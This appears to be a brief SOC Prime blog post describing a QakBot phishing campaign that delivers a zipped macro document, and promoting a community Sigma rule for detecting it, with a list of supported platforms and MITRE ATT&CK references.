New QakBot Techniques

The QBot banking Trojan that is also known as Qakbot or Pinkslipbot has been known to cybersecurity researchers since 2008, and it keeps tricking the business with emerging campaigns demonstrating its elaborated stealth capabilities.

Another phishing campaign delivering the malicious document has attracted the researchers’ attention. The latest QakBot attack is notable for delivering a ZIP file with a document, not a Microsoft Word document attachment. The zipped document includes a macro executing a PowerShell script that on its turn downloads the QakBot payload from the predefined URL. 

We already warned our readers about the cunning QakBot Trojan in the Rule of the Week post. https://socprime.com/blog/rule-of-the-week-qbot-trojan-detection/

Today, we want to inform you that the attackers have added two techniques to their arsenal – CDR (content disarm and reconstruction) technology bypass, as well as child-parent pattern detection bypass.

Osman Demir, active participant of Threat Bounty Developer Program published a Sigma rule to detect the modernized QakBot Trojan:

https://tdm.socprime.com/?dateFrom=0&dateTo=0&searchProject=content&searchType%5B%5D=name&searchSubType=&searchQueryFeatures=false&searchValue=qakbat+maldoc+campaign+two+new+techniques

The rule has translations for the following platforms:

SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, LogPoint, Humio

EDR: Carbon Black, Elastic Endpoint

MITRE ATT&CK: 

Tactics: Execution

Techniques: Command-Line Interface (T1059), PowerShell (T1059), User Execution (T1204)

Ready to try out SOC Prime TDM? Sign up for free. Or join Threat Bounty Program to craft your own content and share it with the TDM community.